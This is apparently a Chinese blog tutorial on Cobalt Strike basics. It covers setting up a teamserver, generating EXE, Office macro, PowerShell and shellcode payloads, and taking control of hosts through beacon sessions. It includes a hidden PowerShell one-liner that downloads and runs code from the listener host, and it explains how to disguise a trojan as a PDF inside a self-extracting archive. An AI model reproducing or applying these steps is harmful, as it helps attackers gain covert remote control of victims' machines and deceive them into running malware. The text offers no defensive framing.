cobalt strike基础使用

coblat strike使用

服务搭建

首先将server端文件放进kali中

对其赋权

执行时需要root权限

设置ip

启动服务

./teamserver 10.4.7.138 123456

回到win11启动cs，输入刚才配置的信息

上线方式

木马（exe上线）

查看一下开放的端口

添加监听

再查看端口就发现一个新的监听端口

新建木马

如果使用耳机添加过监听的话，选择choose就行了

执行一下木马，主机就上线了

右键选择interact可以进入beacon会话

此时可以将sleep设为3

直接用问号就可以看能使用的命令字

也可以执行命令

shell whoami

点击这个可以看到连接关系

宏病毒

输入个名字创建一下

选择ms office

生成之后选择复制

内容粘贴进去

生成的文件双击点击上线

powershell

同样选择监听对象然后生成

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.4.7.138:80/a'))"

powershell中执行一下，主机上线

shellcode

仍然是选择监听对象然后生成

可以记事本打开看看

这些数据格式其实就是硬编码加x

可以使用加载器将这串编成exe格式

首先生成一个木马，然后贴进去一个pdf文件

选中两个选择添加压缩文件

勾选创建自解压文件

此处需要将光标放在fdp之前，插入完成后可以看到

双击之后主机就会上线

并且打开pdf文件

插件

重载后发现多了一个巨龙拉冬